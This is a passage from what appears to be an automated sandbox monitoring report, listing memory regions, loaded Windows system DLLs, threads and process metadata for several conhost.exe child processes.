region_type = private name = "private_0x000000a838030000" filename = "" Region: id = 4804 start_va = 0xa8380e0000 end_va = 0xa8380effff entry_point = 0x0 region_type = private name = "private_0x000000a8380e0000" filename = "" Region: id = 4805 start_va = 0xa839880000 end_va = 0xa83998efff entry_point = 0x0 region_type = private name = "private_0x000000a839880000" filename = "" Region: id = 4806 start_va = 0xa839a00000 end_va = 0xa839a0ffff entry_point = 0x0 region_type = private name = "private_0x000000a839a00000" filename = "" Region: id = 4807 start_va = 0xa839a10000 end_va = 0xa839d46fff entry_point = 0xa839a10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4808 start_va = 0xa839d50000 end_va = 0xa839f6ffff entry_point = 0x0 region_type = private name = "private_0x000000a839d50000" filename = "" Region: id = 4809 start_va = 0xa839f70000 end_va = 0xa83a185fff entry_point = 0x0 region_type = private name = "private_0x000000a839f70000" filename = "" Region: id = 4810 start_va = 0xa83a190000 end_va = 0xa83a3aafff entry_point = 0x0 region_type = private name = "private_0x000000a83a190000" filename = "" Region: id = 4811 start_va = 0xa83a3b0000 end_va = 0xa83a4befff entry_point = 0x0 region_type = private name = "private_0x000000a83a3b0000" filename = "" Region: id = 4812 start_va = 0x7ff6c3f6a000 end_va = 0x7ff6c3f6bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f6a000" filename = "" Region: id = 4813 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4814 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4815 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4816 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4817 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4818 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4819 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4820 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4821 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 118 os_tid = 0xe9c Thread: id = 206 os_tid = 0x1024 Thread: id = 210 os_tid = 0x104c Thread: id = 313 os_tid = 0x1214 Process: id = "88" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x78bbc000" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0xd3c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1932 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1933 start_va = 0x3894400000 end_va = 0x389441ffff entry_point = 0x0 region_type = private name = "private_0x0000003894400000" filename = "" Region: id = 1934 start_va = 0x3894420000 end_va = 0x3894433fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003894420000" filename = "" Region: id = 1935 start_va = 0x3894440000 end_va = 0x389447ffff entry_point = 0x0 region_type = private name = "private_0x0000003894440000" filename = "" Region: id = 1936 start_va = 0x7df5ffd50000 end_va = 0x7ff5ffd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd50000" filename = "" Region: id = 1937 start_va = 0x7ff6c4660000 end_va = 0x7ff6c4682fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4660000" filename = "" Region: id = 1938 start_va = 0x7ff6c4686000 end_va = 0x7ff6c4686fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4686000" filename = "" Region: id = 1939 start_va = 0x7ff6c468e000 end_va = 0x7ff6c468ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c468e000" filename = "" Region: id = 1940 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1941 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1942 start_va = 0x38945f0000 end_va = 0x38946effff entry_point = 0x0 region_type = private name = "private_0x00000038945f0000" filename = "" Region: id = 1943 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1944 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2479 start_va = 0x3894400000 end_va = 0x389440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003894400000" filename = "" Region: id = 2480 start_va = 0x3894410000 end_va = 0x3894416fff entry_point = 0x0 region_type = private name = "private_0x0000003894410000" filename = "" Region: id = 2481 start_va = 0x3894480000 end_va = 0x389453dfff entry_point = 0x3894480000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2482 start_va = 0x3894540000 end_va = 0x389457ffff entry_point = 0x0 region_type = private name = "private_0x0000003894540000" filename = "" Region: id = 2483 start_va = 0x3894580000 end_va = 0x3894580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003894580000" filename = "" Region: id = 2484 start_va = 0x3894590000 end_va = 0x3894596fff entry_point = 0x0 region_type = private name = "private_0x0000003894590000" filename = "" Region: id = 2485 start_va = 0x38945a0000 end_va = 0x38945a0fff entry_point = 0x0 region_type = private name = "private_0x00000038945a0000" filename = "" Region: id = 2486 start_va = 0x38945b0000 end_va = 0x38945b0fff entry_point = 0x0 region_type = private name = "private_0x00000038945b0000" filename = "" Region: id = 2487 start_va = 0x38945c0000 end_va = 0x38945cffff entry_point = 0x0 region_type = private name = "private_0x00000038945c0000" filename = "" Region: id = 2488 start_va = 0x38946f0000 end_va = 0x3894877fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000038946f0000" filename = "" Region: id = 2489 start_va = 0x3894880000 end_va = 0x3894a00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003894880000" filename = "" Region: id = 2490 start_va = 0x3894a10000 end_va = 0x3895e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003894a10000" filename = "" Region: id = 2491 start_va = 0x7ff6c4560000 end_va = 0x7ff6c465ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4560000" filename = "" Region: id = 2492 start_va = 0x7ff6c468c000 end_va = 0x7ff6c468dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c468c000" filename = "" Region: id = 2493 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2494 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2495 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2496 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2497 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2498 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2499 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2500 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2501 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2502 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2503 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2504 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 119 os_tid = 0xea4 Thread: id = 158 os_tid = 0xfc4 Thread: id = 202 os_tid = 0x1014 Thread: id = 268 os_tid = 0x1160 Process: id = "89" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf5de000" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xd44" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1945 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1946 start_va = 0x726f4f0000 end_va = 0x726f50ffff entry_point = 0x0 region_type = private name = "private_0x000000726f4f0000" filename = "" Region: id = 1947 start_va = 0x726f510000 end_va = 0x726f523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000726f510000" filename = "" Region: id = 1948 start_va = 0x726f530000 end_va = 0x726f56ffff entry_point = 0x0 region_type = private name = "private_0x000000726f530000" filename = "" Region: id = 1949 start_va = 0x7df5ff950000 end_va = 0x7ff5ff94ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff950000" filename = "" Region: id = 1950 start_va = 0x7ff6c4120000 end_va = 0x7ff6c4142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4120000" filename = "" Region: id = 1951 start_va = 0x7ff6c414d000 end_va = 0x7ff6c414efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c414d000" filename = "" Region: id = 1952 start_va = 0x7ff6c414f000 end_va = 0x7ff6c414ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c414f000" filename = "" Region: id = 1953 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1954 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1955 start_va = 0x726f6b0000 end_va = 0x726f7affff entry_point = 0x0 region_type = private name = "private_0x000000726f6b0000" filename = "" Region: id = 1956 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1957 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2586 start_va = 0x726f4f0000 end_va = 0x726f4fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000726f4f0000" filename = "" Region: id = 2587 start_va = 0x726f500000 end_va = 0x726f506fff entry_point = 0x0 region_type = private name = "private_0x000000726f500000" filename = "" Region: id = 2588 start_va = 0x726f570000 end_va = 0x726f62dfff entry_point = 0x726f570000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2589 start_va = 0x726f630000 end_va = 0x726f66ffff entry_point = 0x0 region_type = private name = "private_0x000000726f630000" filename = "" Region: id = 2590 start_va = 0x726f670000 end_va = 0x726f670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000726f670000" filename = "" Region: id = 2591 start_va = 0x726f680000 end_va = 0x726f686fff entry_point = 0x0 region_type = private name = "private_0x000000726f680000" filename = "" Region: id = 2592 start_va = 0x726f690000 end_va = 0x726f690fff entry_point = 0x0 region_type = private name = "private_0x000000726f690000" filename = "" Region: id = 2593 start_va = 0x726f6a0000 end_va = 0x726f6a0fff entry_point = 0x0 region_type = private name = "private_0x000000726f6a0000" filename = "" Region: id = 2594 start_va = 0x726f7b0000 end_va = 0x726f937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000726f7b0000" filename = "" Region: id = 2595 start_va = 0x726f950000 end_va = 0x726f95ffff entry_point = 0x0 region_type = private name = "private_0x000000726f950000" filename = "" Region: id = 2596 start_va = 0x726f960000 end_va = 0x726fae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000726f960000" filename = "" Region: id = 2597 start_va = 0x726faf0000 end_va = 0x7270eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000726faf0000" filename = "" Region: id = 2598 start_va = 0x7ff6c4020000 end_va = 0x7ff6c411ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4020000" filename = "" Region: id = 2599 start_va = 0x7ff6c414b000 end_va = 0x7ff6c414cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c414b000" filename = "" Region: id = 2600 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2601 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2602 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2603 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2604 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2605 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2606 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2607 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2608 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2609 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2610 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2611 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4004 start_va = 0x7270ef0000 end_va = 0x7270f2ffff entry_point = 0x0 region_type = private name = "private_0x0000007270ef0000" filename = "" Region: id = 4005 start_va = 0x7270f30000 end_va = 0x727103dfff entry_point = 0x0 region_type = private name = "private_0x0000007270f30000" filename = "" Region: id = 4006 start_va = 0x7271050000 end_va = 0x727105ffff entry_point = 0x0 region_type = private name = "private_0x0000007271050000" filename = "" Region: id = 4007 start_va = 0x7271070000 end_va = 0x727107ffff entry_point = 0x0 region_type = private name = "private_0x0000007271070000" filename = "" Region: id = 4008 start_va = 0x7271080000 end_va = 0x72713b6fff entry_point = 0x7271080000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4009 start_va = 0x72713c0000 end_va = 0x72715d5fff entry_point = 0x0 region_type = private name = "private_0x00000072713c0000" filename = "" Region: id = 4010 start_va = 0x72715e0000 end_va = 0x72717f7fff entry_point = 0x0 region_type = private name = "private_0x00000072715e0000" filename = "" Region: id = 4011 start_va = 0x7271800000 end_va = 0x7271a10fff entry_point = 0x0 region_type = private name = "private_0x0000007271800000" filename = "" Region: id = 4012 start_va = 0x7271a20000 end_va = 0x7271b2efff entry_point = 0x0 region_type = private name = "private_0x0000007271a20000" filename = "" Region: id = 4013 start_va = 0x7ff6c4149000 end_va = 0x7ff6c414afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4149000" filename = "" Region: id = 4014 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4015 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4016 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4017 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4018 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4019 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4020 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4021 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4022 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 120 os_tid = 0xeac Thread: id = 157 os_tid = 0xfc0 Thread: id = 207 os_tid = 0x1028 Thread: id = 274 os_tid = 0x1178 Process: id = "90" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf7d7000" os_pid = "0xeb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0xd4c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1958 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1959 start_va = 0xc47cff0000 end_va = 0xc47d00ffff entry_point = 0x0 region_type = private name = "private_0x000000c47cff0000" filename = "" Region: id = 1960 start_va = 0xc47d010000 end_va = 0xc47d023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c47d010000" filename = "" Region: id = 1961 start_va = 0xc47d030000 end_va = 0xc47d06ffff entry_point = 0x0 region_type = private name = "private_0x000000c47d030000" filename = "" Region: id = 1962 start_va = 0x7df5ff9b0000 end_va = 0x7ff5ff9affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9b0000" filename = "" Region: id = 1963 start_va = 0x7ff6c43e0000 end_va = 0x7ff6c4402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43e0000" filename = "" Region: id = 1964 start_va = 0x7ff6c440a000 end_va = 0x7ff6c440afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440a000" filename = "" Region: id = 1965 start_va = 0x7ff6c440e000 end_va = 0x7ff6c440ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440e000" filename = "" Region: id = 1966 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1967 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1968 start_va = 0xc47d180000 end_va = 0xc47d27ffff entry_point = 0x0 region_type = private name = "private_0x000000c47d180000" filename = "" Region: id = 1969 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1970 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3264 start_va = 0xc47cff0000 end_va = 0xc47cffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c47cff0000" filename = "" Region: id = 3265 start_va = 0xc47d000000 end_va = 0xc47d006fff entry_point = 0x0 region_type = private name = "private_0x000000c47d000000" filename = "" Region: id = 3266 start_va = 0xc47d070000 end_va = 0xc47d12dfff entry_point = 0xc47d070000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3267 start_va = 0xc47d130000 end_va = 0xc47d16ffff entry_point = 0x0 region_type = private name = "private_0x000000c47d130000" filename = "" Region: id = 3268 start_va = 0xc47d170000 end_va = 0xc47d170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c47d170000" filename = "" Region: id = 3269 start_va = 0xc47d280000 end_va = 0xc47d286fff entry_point = 0x0 region_type = private name = "private_0x000000c47d280000" filename = "" Region: id = 3270 start_va = 0xc47d290000 end_va = 0xc47d417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c47d290000" filename = "" Region: id = 3271 start_va = 0xc47d420000 end_va = 0xc47d420fff entry_point = 0x0 region_type = private name = "private_0x000000c47d420000" filename = "" Region: id = 3272 start_va = 0xc47d430000 end_va = 0xc47d430fff entry_point = 